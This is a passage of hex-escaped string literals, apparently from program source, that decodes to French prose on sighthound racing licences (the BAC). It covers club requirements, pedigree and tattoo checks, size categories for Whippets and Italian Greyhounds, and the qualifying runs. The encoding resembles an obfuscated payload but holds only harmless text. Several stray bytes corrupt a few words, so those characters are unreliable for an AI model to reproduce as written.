+"\x2e\x0d\x44\x61\x6e\x73\x20\x74\x6f\x75\x73\x20\x63\x65\x73\x20"
+"\x63\x61\x73\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x6e"
+"\x65\x20\x70\x65\x75\x74\x20\xea\x74\x72\x65\x20\x61\x63\x63\x65"
+"\x70\x74\xe9\x20\x65\x6e\x20\x63\x6f\x75\x72\x73\x65\x2e\x20\x4c"
+"\x65\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x20\x76\x61\x20\x64\xe9"
+"\x70\x65\x6e\x64\x72\x65\x20\x64\x65\x20\x76\x6f\x74\x72\x65\x20"
+"\x61\x73\x73\x69\x64\x75\x69\x74\xe9\x20\xe0\x20\x6c\x27\x65\x6e"
+"\x74\x72\x61\xee\x6e\x65\x6d\x65\x6e\x74\x20\x65\x74\x20\x64\x65"
+"\x20\x6c\x61\x20\x76\x61\x6c\x65\x75\x72\x20\x64\x65\x73\x20\x6d"
+"\x6f\x6e\x69\x74\x65\x75\x72\x73\x20\x64\x75\x20\x63\x6c\x75\x62"
+"\x2e\x20\x49\x6c\x20\x65\x78\x69\x73\x74\x65\x20\x64\x69\x76\x65"
+"\x72\x73\x65\x73\x20\x6d\xe9\x74\x68\x6f\x64\x65\x73\x20\x70\x6f"
+"\x75\x72\x20\x72\x65\x64\x72\x65\x73\x73\x65\x72\x20\x75\x6e\x20"
+"\x61\x74\x74\x61\x71\x75\x61\x6e\x74\x20\x28\x71\x75\x69\x20\x65"
+"\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x65\x73\x74\x20\x75\x6e"
+"\x20\x6a\x6f\x75\x65\x75\x72\x20\x6f\x75\x20\x75\x6e\x20\x63\x72"
+"\x61\x69\x6e\x74\x69\x66\x2c\x20\x72\x61\x72\x65\x6d\x65\x6e\x74"
+"\x20\x75\x6e\x20\x61\x67\x72\x65\x73\x73\x69\x66\x29\x2e\x0d\x56"
+"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x73\x61\x69"
+"\x74\x20\x63\x6f\x75\x72\x69\x72\x20\x65\x6e\x20\x67\x72\x6f\x75"
+"\x70\x65\x2c\x20\x69\x6c\x20\x65\x73\x74\x20\x70\x72\xea\x74\x20"
+"\xe0\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x6c\x65\x20\x64\x72\x6f"
+"\x69\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x2e\x0d\x0d\x4c"
+"\x65\x20\x70\x61\x73\x73\x61\x67\x65\x20\x64\x75\x20\x42\x41\x43"
+"\x0d\x50\x6f\x75\x72\x20\x63\x65\x6c\x61\x20\x69\x6c\x20\x64\x6f"
+"\x69\x74\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x20\x42\x72"
+"\x65\x76\x65\x74\x20\x64\x27\x41\x70\x74\x69\x74\x75\x64\x65\x20"
+"\x61\x75\x78\x20\x20\x43\x6f\x75\x72\x73\x65\x73\x20\x28\x42\x2e"
+"\x41\x2e\x43\x2e\x29\x20\x20\x65\x74\x20\x75\x6e\x65\x20\x61\x74"
+"\x74\x65\x73\x74\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x76\x61\x6c"
+"\x69\x64\x69\x74\xe9\x20\x28\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f"
+"\x6c\x6f\x72\xe9\x2c\x20\x6c\x69\x63\x65\x6e\x63\x65\x29\x2e\x0d"
+"\x0d\x4f\xf9\x3a\x0d\x4f\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65"
+"\x6d\x65\x6e\x74\x20\x64\x61\x6e\x73\x20\x6c\x65\x20\x63\x6c\x75"
+"\x62\x20\x61\x67\x72\xe9\xe9\x20\x64\x6f\x6e\x74\x20\x64\xe9\x70"
+"\x65\x6e\x64\x20\x76\x6f\x74\x72\x65\x20\x6c\x69\x65\x75\x20\x64"
+"\x65\x20\x72\xe9\x73\x69\x64\x65\x6e\x63\x65\x20\x28\x73\x61\x75"
+"\x66\x20\x50\x61\x72\x69\x73\x20\x6f\xf9\x20\x63\x68\x61\x71\x75"
+"\x65\x20\x63\x6c\x75\x62\x20\x63\x6f\x75\x76\x72\x65\x20\x6c\x27"
+"\x49\x6c\x65\x20\x64\x65\x20\x46\x72\x61\x6e\x63\x65\x29\x2e\x20"
+"\x4d\x61\x69\x73\x20\x73\x75\x72\x20\x64\x65\x6d\x61\x6e\x64\x65"
+"\x20\x6d\x6f\x74\x69\x76\xe9\x65\x20\x76\x6f\x75\x73\x20\x70\x6f"
+"\x75\x76\x65\x7a\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x65"
+"\x20\x64\xe9\x72\x6f\x67\x61\x74\x69\x6f\x6e\x20\x70\x6f\x75\x72"
+"\x20\x61\x6c\x6c\x65\x72\x20\x61\x69\x6c\x6c\x65\x75\x72\x73\x2c"
+"\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x65\x20\x50\x72\xe9"
+"\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x63\x6c\x75\x62\x20\x61"
+"\x74\x74\x72\x69\x62\x75\x74\x61\x69\x72\x65\x2c\x20\x73\x6f\x69"
+"\x74\x20\x65\x6e\x20\x63\x61\x73\x20\x72\x65\x66\x75\x73\x2c\x20"
+"\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f"
+"\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x2e\x20\x49\x6c\x20\x66"
+"\x61\x75\x74\x20\x74\x6f\x75\x6a\x6f\x75\x72\x73\x20\x75\x6e\x20"
+"\x6d\x6f\x74\x69\x66\x20\xe9\x63\x72\x69\x74\x2e\x0d\x0d\x43\x6f"
+"\x6d\x6d\x65\x6e\x74\x20\x3a\x0d\x31\x29\x20\x56\x6f\x75\x73\x20"
+"\xe9\x63\x72\x69\x76\x65\x7a\x20\xe0\x20\x6c\x61\x20\x53\x6f\x63"
+"\x69\xe9\x74\xe9\x20\x43\x65\x6e\x74\x72\x61\x6c\x65\x20\x43\x61"
+"\x6e\x69\x6e\x65\x20\x71\x75\x69\x20\x76\x6f\x75\x73\x20\x76\x65"
+"\x6e\x64\x20\x75\x6e\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65\x20"
+"\x74\x72\x61\x76\x61\x69\x6c\x2c\x20\x64\x6f\x6e\x74\x20\x6c\x65"
+"\x20\x6d\x6f\x64\xe8\x6c\x65\x20\x65\x73\x74\x20\x64\xe9\x73\x6f"
+"\x72\x6d\x61\x69\x73\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x6f\x75"
+"\x72\x20\x6c\x61\x20\x46\x72\x61\x6e\x63\x65\x20\x65\x74\x20\x6c"
+"\x27\xe9\x74\x72\x61\x6e\x67\x65\x72\x2c\x20\x6d\x61\x69\x73\x20"
+"\x71\x75\x69\x20\x6e\x65\x20\x73\x75\x66\x66\x69\x74\x20\x70\x61"
+"\x73\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72\x69\x72\x2e\x20\x0d"
+"\x50\x75\x69\x73\x20\x76\x6f\x75\x73\x20\xe9\x63\x72\x69\x76\x65"
+"\x7a\x20\x61\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x64"
+"\x65\x20\x43\x6c\x75\x62\x20\x70\x6f\x75\x72\x20\x6c\x75\x69\x20"
+"\x64\x65\x6d\x61\x6e\x64\x65\x72\x20\x75\x6e\x20\x70\x61\x73\x73"
+"\x61\x67\x65\x20\x64\x65\x20\x42\x41\x43\x2c\x20\x61\x75\x20\x6d"
+"\x6f\x69\x6e\x73\x20\x31\x35\x20\x6a\x6f\x75\x72\x73\x20\xe0\x20"
+"\x6c\x27\x61\x76\x61\x6e\x63\x65\x2e\x20\x44\xe8\x73\x20\x71\x75"
+"\x65\x20\x6c\x61\x20\x64\x61\x74\x65\x20\x65\x73\x74\x20\x66\x69"
+"\x78\xe9\x65\x2c\x20\x76\x6f\x75\x73\x20\x76\x65\x6e\x65\x7a\x20"
+"\x61\x76\x65\x63\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x72\x6e\x65"
+"\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x2c\x20\x6c\x61"
+"\x20\x70\x68\x6f\x74\x6f\x63\x6f\x70\x69\x65\x20\x64\x75\x20\x70"
+"\x65\x64\x69\x67\x72\x65\x65\x20\x65\x74\x20\x6c\x61\x20\x63\x61"
+"\x72\x74\x65\x20\x64\x65\x20\x74\x61\x74\x6f\x75\x61\x67\x65\x2e"
+"\x0d\x53\x65\x75\x6c\x20\x6c\x65\x73\x20\x4c\xe9\x76\x72\x69\x65"
+"\x72\x73\x20\x63\x6f\x6e\x66\x69\x72\x6d\xe9\x73\x2c\x20\x64\x6f"
+"\x6e\x63\x20\x64\x6f\x74\xe9\x73\x20\x64\x27\x75\x6e\x20\x70\x65"
+"\x64\x69\x67\x72\x65\x65\x20\x64\xe9\x66\x69\x6e\x69\x74\x69\x66"
+"\x2c\x20\x73\x6f\x6e\x74\x20\x61\x75\x74\x6f\x72\x69\x73\xe9\x73"
+"\x20\xe0\x20\x70\x61\x73\x73\x65\x72\x20\x75\x6e\x20\x42\x41\x43"
+"\x2e\x0d\x44\x61\x6e\x73\x20\x63\x65\x72\x74\x61\x69\x6e\x73\x20"
+"\x63\x61\x73\x2c\x20\x6f\x6e\x20\x70\x65\x75\x74\x20\x61\x63\x63"
+"\x65\x70\x74\x65\x72\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72"
+"\x20\x62\x69\x65\x6e\x20\x71\x75\x65\x20\x6c\x65\x20\x20\x70\x65"
+"\x64\x69\x67\x72\x65\x65\x20\x6e\x65\x20\x73\x6f\x69\x74\x20\x70"
+"\xa3\x73\x20\x61\x72\x72\x69\x76\xe9\x2c\x20\x6d\x61\x69\x73\x20"
+"\x6c\x65\x73\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x6e\x65"
+"\x20\x73\x65\x72\x6f\x6e\x74\x20\x70\x61\x73\x20\x64\xe9\x6c\x69"
+"\x76\x72\xe9\x73\x20\x61\x76\x61\x6e\x74\x20\x72\xe9\x63\x65\x70"
+"\x74\x69\x6f\x6e\x20\x64\x75\x20\x70\x65\x64\x69\x67\x72\x65\x65"
+"\x2e\x20\x4c\x65\x73\x20\x42\x41\x43\x20\x6e\x65\x20\x70\x65\x75"
+"\x76\x65\x6e\x74\x20\x70\x61\x73\x20\xea\x74\x72\x65\x20\x70\x61"
+"\x73\x73\xe9\x73\x20\x75\x6e\x20\x6a\x6f\x75\x72\x20\x64\x65\x20"
+"\x63\x6f\x75\x72\x73\x65\x2c\x20\x73\x61\x75\x66\x20\x65\x78\x63"
+"\x65\x70\x74\x69\x6f\x6e\x73\x20\x70\x72\xe9\x76\x75\x65\x73\x20"
+"\x61\x75\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x2e\x0d\x0d\x32"
+"\x29\x20\x4c\x27\x65\x78\x70\x65\x72\x74\x2d\x71\x75\x61\x6c\x69"
+"\x66\x69\x63\x61\x74\x65\x75\x72\x20\x28\x45\x51\x29\x20\x63\x6f"
+"\x6e\x74\x72\xf4\x6c\x65\x20\x6c\x65\x73\x20\x70\x61\x70\x69\x65"
+"\x72\x73\x2c\x20\x6c\x65\x20\x74\x61\x74\x6f\x75\x61\x67\x65\x2e"
+"\x0d\x50\x6f\x75\x72\x20\x6c\x65\x73\x20\x57\x68\x69\x70\x70\x65"
+"\x74\x73\x2c\x20\x69\x6c\x20\x70\xe8\x73\x65\x20\x6c\x65\x20\x63"
+"\x68\x69\x65\x6e\x2c\x20\x70\x75\x69\x73\x20\x70\x72\x65\x6e\x64"
+"\x20\x39\x20\x74\x6f\x69\x73\x65\x73\x20\x61\x75\x20\x67\x61\x72"
+"\x72\x6f\x74\x20\x70\x6f\x75\x72\x20\x72\x65\x74\x65\x6e\x69\x72"
+"\x20\x63\x65\x6c\x6c\x65\x20\x64\x75\x20\x6d\x69\x6c\x69\x65\x75"
+"\x2c\x20\x6c\x61\x20\x6d\xe9\x64\x69\x61\x6e\x65\x2e\x20\x49\x6c"
+"\x20\x70\x65\x75\x74\x20\x61\x75\x73\x73\x69\x20\x66\x61\x69\x72"
+"\x65\x20\x70\x61\x73\x73\x65\x72\x20\x6c\x65\x20\x57\x68\x69\x70"
+"\x70\x65\x74\x20\x73\x6f\x75\x73\x20\x75\x6e\x20\x67\x61\x62\x61"
+"\x72\x69\x74\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x2e\x0d\x54\x61"
+"\x69\x6c\x6c\x65\x20\x26\x20\x70\x6f\x69\x64\x73\x20\x64\xe9\x74"
+"\x65\x72\x6d\x69\x6e\x65\x6e\x74\x20\x6c\x61\x20\x63\x61\x74\xe9"
+"\x67\x6f\x72\x69\x65\x20\x64\x65\x20\x66\x6f\x72\x6d\x61\x74\x20"
+"\x28\x70\x65\x74\x69\x74\x73\x20\x6f\x75\x20\x57\x2c\x20\x20\x67"
+"\x72\x61\x6e\x64\x73\x20\x20\x6f\x75\x20\x47\x57\x2c\x20\x74\x72"
+"\xe8\x73\x20\x67\x72\x61\x6e\x64\x73\x20\x6f\x75\x20\x54\x47\x57"
+"\x29\x2e\x20\x4c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x75"
+"\x6c\x74\xe9\x72\x69\x65\x75\x72\x65\x73\x20\x72\x61\x73\x73\x65"
+"\x6d\x62\x6c\x65\x72\x6f\x6e\x74\x20\x64\x65\x73\x20\x63\x6f\x6e"
+"\x63\x75\x72\x72\x65\x6e\x74\x73\x20\x64\x65\x20\x6d\xea\x6d\x65"
+"\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x20\x64\x61\x6e\x73\x20"
+"\x63\x68\x61\x71\x75\x65\x20\x73\x65\x78\x65\x2e\x20\x41\x70\x72"
+"\xe8\x73\x20\x6c\x27\xe2\x67\x65\x20\x64\x65\x20\x32\x20\x61\x6e"
+"\x73\x2c\x20\x75\x6e\x20\x64\x65\x75\x78\x69\xe8\x6d\x65\x20\x63"
+"\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x73\x65\x72\x61\x20\x6f\x62\x6c"
+"\x69\x67\x61\x74\x6f\x69\x72\x65\x2e\x20\x45\x6e\x20\x65\x66\x66"
+"\x65\x74\x20\x6c\x65\x20\x6d\x65\x73\x75\x72\x61\x67\x65\x20\x64"
+"\x65\x20\x6c\x61\x20\x74\x61\x69\x6c\x6c\x65\x20\x65\x73\x74\x20"
+"\x64\xe9\x6c\x69\x63\x61\x74\x20\x65\x6e\x20\x66\x6f\x6e\x63\x74"
+"\x69\x6f\x6e\x20\x64\x65\x20\x6c\x61\x20\x70\x6f\x73\x69\x74\x69"
+"\x6f\x6e\x20\x64\x75\x20\x63\x68\x69\x65\x6e\x2e\x20\x49\x6c\x20"
+"\x79\x20\x61\x20\x66\x72\xe9\x71\x75\x65\x6d\x6d\x65\x6e\x74\x20"
+"\x75\x6e\x20\xe9\x63\x61\x72\x74\x20\x64\x27\x65\x6e\x76\x69\x72"
+"\x6f\x6e\x20\x31\x20\x63\x6d\x20\x65\x6e\x74\x72\x65\x20\x6c\x61"
+"\x20\x6d\xe9\x64\x69\x61\x6e\x65\x20\x65\x74\x20\x6c\x65\x73\x20"
+"\x6d\x65\x73\x75\x72\x65\x73\x20\x65\x78\x74\x72\xea\x6d\x65\x73"
+"\x2e\x20\x41\x76\x61\x6e\x74\x20\x63\x68\x61\x71\x75\x65\x20\x63"
+"\x6f\x75\x72\x73\x65\x2c\x20\x6c\x65\x20\x6a\x75\x67\x65\x20\x70"
+"\x85\x75\x74\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x72\x20\x6c\x65"
+"\x20\x66\x6f\x72\x6d\x61\x74\x20\x65\x74\x20\x63\x68\x61\x6e\x67"
+"\x65\x72\x20\x6c\x61\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x2c"
+"\x20\x73\x61\x75\x66\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x63\x68"
+"\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x6f\xf9\x20\x69\x6c\x20"
+"\x66\x61\x69\x74\x20\x75\x6e\x20\x72\x61\x70\x70\x6f\x72\x74\x2e"
+"\x0d\x4c\x65\x73\x20\x50\x65\x74\x69\x74\x73\x20\x4c\xe9\x76\x72"
+"\x69\x65\x72\x73\x20\x49\x74\x61\x6c\x69\x65\x6e\x73\x20\x64\x6f"
+"\x69\x76\x65\x6e\x74\x20\x61\x75\x73\x73\x69\x20\x73\x75\x62\x69"
+"\x72\x20\x6f\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65\x6d\x65\x6e"
+"\x74\x20\x6c\x65\x73\x20\x39\x20\x74\x6f\x69\x73\x65\x73\x20\x65"
+"\x74\x20\x6c\x65\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x64\x65"
+"\x73\x20\x32\x20\x61\x6e\x73\x2e\x0d\x41\x75\x63\x75\x6e\x20\x6c"
+"\xe9\x76\x72\x69\x65\x72\x20\x6e\x92\x65\x73\x74\x20\x61\x75\x74"
+"\x6f\x72\x69\x73\xe9\x20\xe0\x20\x63\x6f\x6e\x63\x6f\x75\x72\x69"
+"\x72\x20\x65\x6e\x20\xe9\x70\x72\x65\x75\x76\x65\x20\x6f\x66\x66"
+"\x69\x63\x69\x65\x6c\x6c\x65\x20\x73\x92\x69\x6c\x20\x64\xe9\x70"
+"\x61\x73\x73\x65\x20\x6c\x65\x73\x20\x6e\x6f\x72\x6d\x65\x73\x20"
+"\x64\x65\x20\x74\x61\x69\x6c\x6c\x65\x20\x6f\x75\x20\x64\x65\x20"
+"\x70\x6f\x69\x64\x73\x20\x69\x6d\x70\x6f\x73\xe9\x65\x73\x20\x70"
+"\x61\x72\x20\x6c\x65\x73\x20\x72\xe8\x12\x6c\x65\x6d\x65\x6e\x74"
+"\x73\x2e\x0d\x49\x6c\x20\x65\x78\x69\x73\x74\x65\x20\x64\x65\x73"
+"\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x73\x20\x64\x65\x20"
+"\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x61\x75\x78\x71\x75\x65\x6c"
+"\x6c\x65\x73\x20\x76\x6f\x75\x73\x20\x70\x6f\x75\x76\x65\x7a\x20"
+"\x64\xe9\x66\xe9\x72\x65\x72\x20\x76\x6f\x74\x72\x65\x20\x57\x68"
+"\x69\x70\x70\x65\x74\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\x50"
+"\x4c\x49\x2c\x20\x6f\x75\x20\x76\x6f\x75\x73\x20\x76\x6f\x69\x72"
+"\x20\x63\x6f\x6e\x76\x6f\x71\x75\xe9\x20\x63\x61\x72\x20\x69\x6c"
+"\x20\x65\x78\x69\x73\x74\x65\x20\x75\x6e\x65\x20\x72\x65\x6c\x61"
+"\x74\x69\x6f\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x65\x20\x65\x6e"
+"\x74\x72\x65\x20\x66\x6f\x72\x6d\x61\x74\x20\x65\x74\x20\x76\x69"
+"\x74\x65\x73\x73\x65\x2e\x20\x4f\x6e\x20\x6e\x65\x20\x66\x61\x69"
+"\x74\x20\x70\x61\x73\x20\x63\x6f\x6e\x63\x6f\x75\x72\x69\x72\x20"
+"\x64\x65\x73\x20\x70\x6f\x69\x64\x73\x20\x70\x6c\x75\x6d\x65\x73"
+"\x20\x63\x6f\x6e\x74\x72\x65\x20\x64\x65\x73\x20\x70\x6f\x69\x64"
+"\x73\x20\x6c\x6f\x75\x72\x64\x73\x2e\x20\x44\x65\x70\x75\x69\x73"
+"\x20\x6c\x61\x20\x6d\x69\x73\x65\x20\x65\x6e\x20\x70\x6c\x61\x63"
+"\x65\x20\x64\x75\x20\x73\x79\x73\x74\xe8\x6d\x65\x20\x74\x61\x69"
+"\x6c\x6c\x65\x2f\x70\x6f\x69\x64\x73\x20\x69\x6c\x20\x79\x20\x61"
+"\x20\x74\x72\xe8\x73\x20\x70\x65\x75\x20\x64\x65\x20\x63\x6f\x6e"
+"\x74\x65\x73\x74\x61\x74\x69\x6f\x6e\x73\x20\x61\x75\x20\x6e\x69"
+"\x76\x65\x61\x75\x20\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x2e\x20\x4c"
+"\x27\x61\x62\x73\x65\x6e\x63\x65\x20\x64\x65\x20\x63\x6f\x6e\x74"
+"\x72\xf4\x6c\x65\x73\x20\x69\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f"
+"\x6e\x61\x75\x78\x20\x73\x6f\x75\x6c\xe8\x76\x65\x20\x70\x61\x72"
+"\x20\x63\x6f\x6e\x74\x72\x65\x20\x62\x69\x65\x6e\x20\x64\x65\x73"
+"\x20\x70\x6f\x6c\xe9\x6d\x69\x71\x75\x65\x73\x2e\x0d\x54\x6f\x75"
+"\x73\x20\x63\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20"
+"\x73\x6f\x6e\x74\x20\x70\x6f\x72\x74\xe9\x73\x20\x73\x75\x72\x20"
+"\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x2e\x0d\x33\x29\x20\x4c\x65"
+"\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x64\x75\x20\x42\x41"
+"\x43\x20\x63\x6f\x6e\x73\x69\x73\x74\x65\x6e\x74\x20\x64\x27\x61"
+"\x62\x6f\x72\x64\x20\x65\x6e\x20\x75\x6e\x20\x73\x6f\x6c\x6f\x20"
+"\x70\x6f\x75\x72\x20\x76\xe9\x72\x69\x66\x69\x65\x72\x20\x6c\x27"
+"\x61\x70\x74\x69\x74\x75\x64\x65\x20\xe0\x20\x73\x75\x69\x76\x72"
+"\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x61\x76\x65\x63"
+"\x20\x61\x72\x64\x65\x75\x72\x2e\x20\x43\x65\x6c\x61\x20\x73\x75"
+"\x66\x66\x69\x74\x20\x70\x6f\x75\x72\x20\x63\x65\x72\x74\x61\x69"
+"\x6e\x65\x73\x20\x72\x61\x63\x65\x73\x20\xe0\x20\x66\x61\x69\x62"
+"\x6c\x65\x20\x65\x66\x66\x65\x63\x74\x69\x66\x2e\x20\x4c\x65\x73"
+"\x20\x57\x68\x69\x70\x70\x65\x74\x73\x20\x64\x6f\x69\x76\x65\x6e"
+"\x74\x20\x66\x61\x69\x72\x65\x2c\x20\x65\x6e\x20\x6f\x75\x74\x72"
+"\x65\x2c\x20\x32\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x65\x6e\x20"
+"\x67\x72\x6f\x75\x70\x65\x2e\x20\x49\x6c\x20\x65\x73\x74\x20\x73"
+"\x6f\x75\x68\x61\x69\x74\x61\x62\x6c\x65\x20\x71\x75\x65\x20\x6c"
+"\x65\x73\x20\x61\x63\x63\x6f\x6d\x70\x61\x67\x6e\x61\x74\x65\x75"
+"\x72\x73\x20\x63\x6f\x6d\x70\x72\x65\x6e\x6e\x65\x6e\x74\x20\x64"
+"\x65\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x64\x65\x20\x76"
+"\x69\x74\x65\x73\x73\x65\x73\x20\x64\x69\x66\x66\xe9\x72\x65\x6e"
+"\x74\x65\x73\x20\x70\x6f\x75\x72\x20\x65\x6e\x63\x61\x64\x72\x65"
+"\x72\x20\x6c\x65\x20\x6e\xe9\x6f\x70\x68\x79\x74\x65\x2e\x20\x41"
+"\x20\x63\x68\x61\x71\x75\x65\x20\x76\x69\x72\x61\x67\x65\x20\x69"
+"\x6c\x20\x79\x20\x61\x20\x75\x6e\x20\x22\x6f\x62\x73\x65\x72\x76"
+"\x61\x74\x65\x75\x72\x22\x2c\x20\x6d\x75\x6e\x69\x20\x64\x27\x75"
+"\x6e\x65\x20\x63\x61\x72\x74\x65\x20\x61\x63\x63\x72\xe9\x64\x69"
+"\x74\x69\x76\x65\x20\x64\x65\x20\x63\x6f\x6d\x70\xe9\x74\x65\x6e"
+"\x63\x65\x2c\x20\x71\x75\x69\x2c\x20\x65\x6e\x20\x63\x61\x73\x20"
+"\x64\x27\x69\x6e\x63\x69\x64\x65\x6e\x74\x20\x69\x6e\x66\x6f\x72"
+"\x6d\x65\x20\x6c\x27\x65\x78\x70\x65\x72\x74\x2e\x0d\x53\x69\x20"
+"\x74\x6f\x75\x74\x20\x73\x27\x65\x73\x74\x20\x62\x69\x65\x6e\x20"
+"\x70\x61\x73\x73\xe9\x2c\x20\x76\x6f\x74\x72\x65\x20\x4c\xe9\x76"
+"\x72\x69\x65\x72\x20\xd1\x62\x74\x69\x65\x6e\x74\x20\x73\x6f\x6e"
+"\x20\x42\x41\x43\x2e\x20\x53\x27\x69\x6c\x20\x79\x20\x61\x20\x75"
+"\x6e\x20\x64\x6f\x75\x74\x65\x2c\x20\x69\x6c\x20\x65\x73\x74\x20"
+"\x61\x6a\x6f\x75\x72\x6e\xe9\x2c\x20\x73\x27\x69\x6c\x20\x79\x20"
+"\x61\x20\x66\x61\x75\x74\x65\x20\x69\x6c\x20\x65\x73\x74\x20\x72"
+"\x65\x66\x75\x73\xe9\x20\x65\x74\x20\x64\x65\x76\x72\x61\x20\x61"
+"\x74\x74\x65\x6e\x64\x72\x65\x20\x31\x20\x6d\x6f\x69\x73\x20\x70"
+"\x6f\x75\x72\x20\x73\x65\x20\x72\x65\x70\x72\xe9\x73\x65\x6e\x74"
+"\x65\x72\x2e\x20\x56\x6f\x75\x73\x20\x64\x65\x76\x72\x65\x7a\x20"
+"\x61\x6c\x6f\x72\x73\x20\x61\x6d\xe9\x6c\x69\x6f\x72\x65\x72\x20"
+"\x73\x6f\x6e\x20\x64\x72\x65\x73\x73\x61\x67\x65\x2e\x0d\x4c\x65"
+"\x20\x63\x6c\x75\x62\x20\x76\x6f\x75\x73\x20\x72\x65\x6d\x65\x74"
+"\x20\x61\x6c\x6f\x72\x73\x20\x75\x6e\x20\x42\x41\x43\x20\x64\x6f"
+"\x6e\x74\x20\x76\x6f\x75\x73\x20\x63\x6f\x6e\x73\x65\x72\x76\x65"
+"\x72\x65\x7a\x20\x70\x72\xe9\x63\x69\x65\x75\x73\x65\x6d\x65\x6e"
+"\x74\x20\x6c\x27\x6f\x72\x69\x67\x69\x6e\x61\x6c\x2e\x20\x49\x6c"
+"\x20\x65\x73\x74\x20\x69\x6e\x73\x63\x72\x69\x74\x20\x73\x75\x72"
+"\x20\x6c\x65\x73\x20\x6e\x6f\x75\x76\x65\x61\x75\x78\x20\x63\x61"
+"\x72\x6e\x65\x74\x73\x2e\x0d\x4c\x65\x20\x63\x6c\x75\x62\x20\x76"
+"\x6f\x75\x73\x20\x72\x65\x6d\x65\x74\x20\xe9\x67\x61\x6c\x65\x6d"
+"\x65\x6e\x74\x20\x75\x6e\x20\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f"
+"\x6c\x6f\x72\xe9\x20\x71\x75\x69\x20\x65\x73\x74\x20\x6c\x61\x20"
+"\x70\x72\x65\x75\x76\x65\x20\x64\x65\x20\x6c\x61\x20\x63\x61\x70"
+"\x61\x63\x69\x74\xe9\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20"
+"\x64\x75\x20\x4c\xe9\x76\x72\x69\x65\x72\x2e\x0d\x50\x61\x72\x20"
+"\x6c\x61\x20\x73\x75\x69\x74\x65\x2c\x20\x76\x6f\x74\x72\x65\x20"
+"\x4c\xe9\x76\x72\x69\x65\x72\x20\x70\x65\x75\x74\x20\x61\x62\x61"
+"\x6e\x64\x6f\x6e\x6e\x65\x72\x20\x65\x6e\x20\xe9\x70\x72\x65\x75"
+"\x76\x65\x2c\x20\x6f\x75\x20\x66\x6c\x6f\x74\x74\x65\x72\x20\x65"
+"\x6e\x20\x63\x6f\x75\x72\x73\x65\x2e\x20\x4f\x6e\x20\x64\x69\x74"
+"\x20\x71\x75\x27\x69\x6c\x20\x6d\x61\x6e\x71\x75\x65\x20\x64\x27"
+"\xe9\x63\x6f\x6c\x61\x67\x65\x2c\x20\x69\x6c\x20\x6e\x27\x65\x73"
+"\x74\x20\x70\x61\x73\x20\x61\x73\x73\x65\x7a\x20\x68\x61\x62\x69"
+"\x74\x75\xe9\x20\xe0\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20"
+"\x65\x6e\x20\x67\x72\x6f\x75\x70\x65\x2e\x20\x4f\x6e\x20\x69\x6e"
+"\x73\x63\x72\x69\x74\x20\x53\x55\x53\x50\x20\x73\x75\x72\x20\x73"
+"\x6f\x6e\x20\x63\x61\x72\x6e\x65\x74\x2e\x0d\x53\x69\x20\x70\x61"
+"\x72\x20\x63\x6f\x6e\x74\x72\x65\x20\x69\x6c\x20\x61\x20\x75\x6e"
+"\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\x67\xea"
+"\x6e\x61\x6e\x74\x20\x70\x6f\x75\x72\x20\x6c\x65\x73\x20\x61\x75"
+"\x74\x72\x65\x73\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73"
+"\x2c\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x64\x69\x73\x71\x75\x61"
+"\x6c\x69\x66\x69\xe9\x20\x65\x74\x20\x69\x6e\x74\x65\x72\x64\x69"
+"\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x20\x70\x65\x6e\x64"
